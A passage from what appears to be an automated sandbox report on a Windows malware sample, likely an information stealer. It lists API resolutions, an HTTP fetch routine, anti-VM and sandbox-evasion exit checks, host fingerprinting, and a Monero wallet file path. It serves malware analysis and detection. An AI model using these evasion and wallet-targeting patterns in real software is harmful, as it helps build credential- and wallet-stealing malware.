                              • GetProcAddress.KERNEL32(752C0000,00FFD020), ref: 0013A25D
                              • GetProcAddress.KERNEL32(752C0000,00FFCED0), ref: 0013A275
                              • GetProcAddress.KERNEL32(752C0000,00FE5790), ref: 0013A28D
                              • GetProcAddress.KERNEL32(74EC0000,00FEB630), ref: 0013A2B3
                              • GetProcAddress.KERNEL32(74EC0000,00FEBA18), ref: 0013A2CB
                              • GetProcAddress.KERNEL32(74EC0000,00FFCE28), ref: 0013A2E3
                              • GetProcAddress.KERNEL32(74EC0000,00FE56F0), ref: 0013A2FC
                              • GetProcAddress.KERNEL32(74EC0000,00FE59D0), ref: 0013A314
                              • GetProcAddress.KERNEL32(74EC0000,00FEB658), ref: 0013A32C
                              • GetProcAddress.KERNEL32(75BD0000,00FFD0B0), ref: 0013A352
                              • GetProcAddress.KERNEL32(75BD0000,00FE58F0), ref: 0013A36A
                              • GetProcAddress.KERNEL32(75BD0000,00FF92C8), ref: 0013A382
                              • GetProcAddress.KERNEL32(75BD0000,00FFCEB8), ref: 0013A39B
                              • GetProcAddress.KERNEL32(75BD0000,00FFCF30), ref: 0013A3B3
                              • GetProcAddress.KERNEL32(75BD0000,00FE5A10), ref: 0013A3CB
                              • GetProcAddress.KERNEL32(75BD0000,00FE56B0), ref: 0013A3E4
                              • GetProcAddress.KERNEL32(75BD0000,00FFD0C8), ref: 0013A3FC
                              • GetProcAddress.KERNEL32(75BD0000,00FFCEE8), ref: 0013A414
                              • GetProcAddress.KERNEL32(75A70000,00FE5990), ref: 0013A436
                              • GetProcAddress.KERNEL32(75A70000,00FFCF90), ref: 0013A44E
                              • GetProcAddress.KERNEL32(75A70000,00FFCF00), ref: 0013A466
                              • GetProcAddress.KERNEL32(75A70000,00FFCF48), ref: 0013A47F
                              • GetProcAddress.KERNEL32(75A70000,00FFCFA8), ref: 0013A497
                              • GetProcAddress.KERNEL32(75450000,00FE57B0), ref: 0013A4B8
                              • GetProcAddress.KERNEL32(75450000,00FE5830), ref: 0013A4D1
                              • GetProcAddress.KERNEL32(75DA0000,00FE5710), ref: 0013A4F2
                              • GetProcAddress.KERNEL32(75DA0000,00FFCFC0), ref: 0013A50A
                              • GetProcAddress.KERNEL32(6F070000,00FE5A30), ref: 0013A530
                              • GetProcAddress.KERNEL32(6F070000,00FE57F0), ref: 0013A548
                              • GetProcAddress.KERNEL32(6F070000,00FE5870), ref: 0013A560
                              • GetProcAddress.KERNEL32(6F070000,00FFD008), ref: 0013A579
                              • GetProcAddress.KERNEL32(6F070000,00FE5890), ref: 0013A591
                              • GetProcAddress.KERNEL32(6F070000,00FE5750), ref: 0013A5A9
                              • GetProcAddress.KERNEL32(6F070000,00FE5A90), ref: 0013A5C2
                              • GetProcAddress.KERNEL32(6F070000,00FE5970), ref: 0013A5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0013A5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0013A607
                              • GetProcAddress.KERNEL32(75AF0000,00FFD1D0), ref: 0013A629
                              • GetProcAddress.KERNEL32(75AF0000,00FF91D8), ref: 0013A641
                              • GetProcAddress.KERNEL32(75AF0000,00FFD1B8), ref: 0013A659
                              • GetProcAddress.KERNEL32(75AF0000,00FFD1E8), ref: 0013A672
                              • GetProcAddress.KERNEL32(75D90000,00FE5730), ref: 0013A693
                              • GetProcAddress.KERNEL32(6F9D0000,00FFD158), ref: 0013A6B4
                              • GetProcAddress.KERNEL32(6F9D0000,00FE5770), ref: 0013A6CD
                              • GetProcAddress.KERNEL32(6F9D0000,00FFD170), ref: 0013A6E5
                              • GetProcAddress.KERNEL32(6F9D0000,00FFD278), ref: 0013A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 89c9571a49e654c4c9148cbe82949f878ee1c2344cdb80c2e450651272d2548c
                              • Instruction ID: f966cc1715ca65d98ec3c341401500f59527f4ea1f0bbadd286552633468512a
                              • Opcode Fuzzy Hash: 89c9571a49e654c4c9148cbe82949f878ee1c2344cdb80c2e450651272d2548c
                              • Instruction Fuzzy Hash: 73622EB5500A00AFC346DFA9EE989563BFDF78C301F14C51AE605E3264D7B9A841EF62
                              Function 00126280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 126280-12630b call 13a7a0 call 1247b0 call 13a740 InternetOpenA StrCmpCA 1040 126314-126318 1033->1040 1041 12630d 1033->1041 1042 126509-126525 call 13a7a0 call 13a800 * 2 1040->1042 1043 12631e-126342 InternetConnectA 1040->1043 1041->1040 1062 126528-12652d 1042->1062 1045 126348-12634c 1043->1045 1046 1264ff-126503 InternetCloseHandle 1043->1046 1047 12635a 1045->1047 1048 12634e-126358 1045->1048 1046->1042 1050 126364-126392 HttpOpenRequestA 1047->1050 1048->1050 1052 1264f5-1264f9 InternetCloseHandle 1050->1052 1053 126398-12639c 1050->1053 1052->1046 1055 1263c5-126405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 12639e-1263bf InternetSetOptionA 1053->1056 1058 126407-126427 call 13a740 call 13a800 * 2 1055->1058 1059 12642c-12644b call 138940 1055->1059 1056->1055 1058->1062 1066 1264c9-1264e9 call 13a740 call 13a800 * 2 1059->1066 1067 12644d-126454 1059->1067 1066->1062 1069 126456-126480 InternetReadFile 1067->1069 1070 1264c7-1264ef InternetCloseHandle 1067->1070 1073 126482-126489 1069->1073 1074 12648b 1069->1074 1070->1052 1073->1074 1078 12648d-1264c5 call 13a9b0 call 13a8a0 call 13a800 1073->1078 1074->1070 1078->1069
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                                • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                              • StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 00126303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                              • HttpOpenRequestA.WININET(00000000,GET,?,00FFE338,00000000,00000000,00400100,00000000), ref: 00126385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001263FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0012646D
                              • InternetCloseHandle.WININET(00000000), ref: 001264EF
                              • InternetCloseHandle.WININET(00000000), ref: 001264F9
                              • InternetCloseHandle.WININET(00000000), ref: 00126503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 28722d2669630939da20bcedb77d8bf832c337a19bb2c2cb350ccffaab6dcdd1
                              • Instruction ID: 47ccd8982b4da7e415ebeebf9ac52c2e3a467d2e2e02317b5b58694984c2cfc7
                              • Opcode Fuzzy Hash: 28722d2669630939da20bcedb77d8bf832c337a19bb2c2cb350ccffaab6dcdd1
                              • Instruction Fuzzy Hash: FB714C71A00218ABDB24EFA0DC59FEE77B8BF44700F508198F10A6B1D0DBB46A85CF52
                              Function 00135510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 135510-135577 call 135ad0 call 13a820 * 3 call 13a740 * 4 1106 13557c-135583 1090->1106 1107 1355d7-13564c call 13a740 * 2 call 121590 call 1352c0 call 13a8a0 call 13a800 call 13aad0 StrCmpCA 1106->1107 1108 135585-1355b6 call 13a820 call 13a7a0 call 121590 call 1351f0 1106->1108 1134 135693-1356a9 call 13aad0 StrCmpCA 1107->1134 1138 13564e-13568e call 13a7a0 call 121590 call 1351f0 call 13a8a0 call 13a800 1107->1138 1124 1355bb-1355d2 call 13a8a0 call 13a800 1108->1124 1124->1134 1139 1356af-1356b6 1134->1139 1140 1357dc-135844 call 13a8a0 call 13a820 * 2 call 121670 call 13a800 * 4 call 136560 call 121550 1134->1140 1138->1134 1143 1357da-13585f call 13aad0 StrCmpCA 1139->1143 1144 1356bc-1356c3 1139->1144 1270 135ac3-135ac6 1140->1270 1163 135991-1359f9 call 13a8a0 call 13a820 * 2 call 121670 call 13a800 * 4 call 136560 call 121550 1143->1163 1164 135865-13586c 1143->1164 1148 1356c5-135719 call 13a820 call 13a7a0 call 121590 call 1351f0 call 13a8a0 call 13a800 1144->1148 1149 13571e-135793 call 13a740 * 2 call 121590 call 1352c0 call 13a8a0 call 13a800 call 13aad0 StrCmpCA 1144->1149 1148->1143 1149->1143 1249 135795-1357d5 call 13a7a0 call 121590 call 1351f0 call 13a8a0 call 13a800 1149->1249 1163->1270 1170 135872-135879 1164->1170 1171 13598f-135a14 call 13aad0 StrCmpCA 1164->1171 1178 1358d3-135948 call 13a740 * 2 call 121590 call 1352c0 call 13a8a0 call 13a800 call 13aad0 StrCmpCA 1170->1178 1179 13587b-1358ce call 13a820 call 13a7a0 call 121590 call 1351f0 call 13a8a0 call 13a800 1170->1179 1199 135a16-135a21 Sleep 1171->1199 1200 135a28-135a91 call 13a8a0 call 13a820 * 2 call 121670 call 13a800 * 4 call 136560 call 121550 1171->1200 1178->1171 1275 13594a-13598a call 13a7a0 call 121590 call 1351f0 call 13a8a0 call 13a800 1178->1275 1179->1171 1199->1106 1200->1270 1249->1143 1275->1171
                              APIs
                                • Part of subcall function 0013A820: lstrlen.KERNEL32(00124F05,?,?,00124F05,00140DDE), ref: 0013A82B
                                • Part of subcall function 0013A820: lstrcpy.KERNEL32(00140DDE,00000000), ref: 0013A885
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001356A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135857
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135228
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 001352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135318
                                • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 0013532F
                                • Part of subcall function 001352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00135364
                                • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 00135383
                                • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 001353AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0013578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00135A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 3e830f7dcdc878cd96d82759de47098a3a68cf50f4b70a0afcd2d0ae310a3260
                              • Instruction ID: 787898088135a3db7e1750242254ba1695c8743b4c7786d93a6bfaaa8d38b919
                              • Opcode Fuzzy Hash: 3e830f7dcdc878cd96d82759de47098a3a68cf50f4b70a0afcd2d0ae310a3260
                              • Instruction Fuzzy Hash: B6E15F72910504AADB09FBA0EC92AED737DAF74300F908168F54767191EF746B09CBA2
                              Function 001317A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 1317a0-1317cd call 13aad0 StrCmpCA 1304 1317d7-1317f1 call 13aad0 1301->1304 1305 1317cf-1317d1 ExitProcess 1301->1305 1309 1317f4-1317f8 1304->1309 1310 1319c2-1319cd call 13a800 1309->1310 1311 1317fe-131811 1309->1311 1313 131817-13181a 1311->1313 1314 13199e-1319bd 1311->1314 1315 131913-131924 StrCmpCA 1313->1315 1316 131932-131943 StrCmpCA 1313->1316 1317 1318f1-131902 StrCmpCA 1313->1317 1318 131951-131962 StrCmpCA 1313->1318 1319 131970-131981 StrCmpCA 1313->1319 1320 131835-131844 call 13a820 1313->1320 1321 13187f-131890 StrCmpCA 1313->1321 1322 13185d-13186e StrCmpCA 1313->1322 1323 131821-131830 call 13a820 1313->1323 1324 131849-131858 call 13a820 1313->1324 1325 1318cf-1318e0 StrCmpCA 1313->1325 1326 13198f-131999 call 13a820 1313->1326 1327 1318ad-1318be StrCmpCA 1313->1327 1314->1309 1348 131930 1315->1348 1349 131926-131929 1315->1349 1350 131945-131948 1316->1350 1351 13194f 1316->1351 1346 131904-131907 1317->1346 1347 13190e 1317->1347 1329 131964-131967 1318->1329 1330 13196e 1318->1330 1332 131983-131986 1319->1332 1333 13198d 1319->1333 1320->1314 1340 131892-13189c 1321->1340 1341 13189e-1318a1 1321->1341 1338 131870-131873 1322->1338 1339 13187a 1322->1339 1323->1314 1324->1314 1344 1318e2-1318e5 1325->1344 1345 1318ec 1325->1345 1326->1314 1342 1318c0-1318c3 1327->1342 1343 1318ca 1327->1343 1329->1330 1330->1314 1332->1333 1333->1314 1338->1339 1339->1314 1355 1318a8 1340->1355 1341->1355 1342->1343 1343->1314 1344->1345 1345->1314 1346->1347 1347->1314 1348->1314 1349->1348 1350->1351 1351->1314 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 001317C5
                              • ExitProcess.KERNEL32 ref: 001317D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 8cb73197a75ecfe531fef55ce9e6fa574f7160cceff1cc1321d1542a0296b1c4
                              • Instruction ID: 673316d5389f6d2599226b072758631f1c08e7d8e4377ff695e18a87fb760fda
                              • Opcode Fuzzy Hash: 8cb73197a75ecfe531fef55ce9e6fa574f7160cceff1cc1321d1542a0296b1c4
                              • Instruction Fuzzy Hash: 90517CB4A0420AFFCB05DFA5D954FBE77BABF44708F108048E906A7251D770E955CB62
                              Function 00137500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 137500-13754a GetWindowsDirectoryA 1357 137553-1375c7 GetVolumeInformationA call 138d00 * 3 1356->1357 1358 13754c 1356->1358 1365 1375d8-1375df 1357->1365 1358->1357 1366 1375e1-1375fa call 138d00 1365->1366 1367 1375fc-137617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 137619-137626 call 13a740 1367->1369 1370 137628-137658 wsprintfA call 13a740 1367->1370 1377 13767e-13768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00137542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0013757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0013760A
                              • wsprintfA.USER32 ref: 00137640
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 46aac63e56c3fe17d35cc860767307d687531225c244122bcce7d8c8e58a2fc5
                              • Instruction ID: ede9c1bf8640516abd16cb24e6c92e60d151b00b0f62aea76d668c7d3c25f21b
                              • Opcode Fuzzy Hash: 46aac63e56c3fe17d35cc860767307d687531225c244122bcce7d8c8e58a2fc5
                              • Instruction Fuzzy Hash: 904180F1D04248ABDB25DF94DC85BEEBBB8AF18700F104199F509B7280DB75AA44CFA5
                              Function 001369F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2488), ref: 001398A1
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2308), ref: 001398BA
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2470), ref: 001398D2
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2320), ref: 001398EA
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2500), ref: 00139903
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF9128), ref: 0013991B
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FE5E10), ref: 00139933
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FE5D90), ref: 0013994C
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2218), ref: 00139964
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2230), ref: 0013997C
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2338), ref: 00139995
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2380), ref: 001399AD
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FE5E30), ref: 001399C5
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2398), ref: 001399DE
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 001211D0: ExitProcess.KERNEL32 ref: 00121211
                                • Part of subcall function 00121160: GetSystemInfo.KERNEL32(?), ref: 0012116A
                                • Part of subcall function 00121160: ExitProcess.KERNEL32 ref: 0012117E
                                • Part of subcall function 00121110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0012112B
                                • Part of subcall function 00121110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00121132
                                • Part of subcall function 00121110: ExitProcess.KERNEL32 ref: 00121143
                                • Part of subcall function 00121220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0012123E
                                • Part of subcall function 00121220: __aulldiv.LIBCMT ref: 00121258
                                • Part of subcall function 00121220: __aulldiv.LIBCMT ref: 00121266
                                • Part of subcall function 00121220: ExitProcess.KERNEL32 ref: 00121294
                                • Part of subcall function 00136770: GetUserDefaultLangID.KERNEL32 ref: 00136774
                                • Part of subcall function 00121190: ExitProcess.KERNEL32 ref: 001211C6
                                • Part of subcall function 00137850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                                • Part of subcall function 00137850: RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                                • Part of subcall function 00137850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                                • Part of subcall function 001378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                                • Part of subcall function 001378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                                • Part of subcall function 001378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FF9198,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00136AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00136AF9
                              • Sleep.KERNEL32(00001770), ref: 00136B04
                              • CloseHandle.KERNEL32(?,00000000,?,00FF9198,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136B1A
                              • ExitProcess.KERNEL32 ref: 00136B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
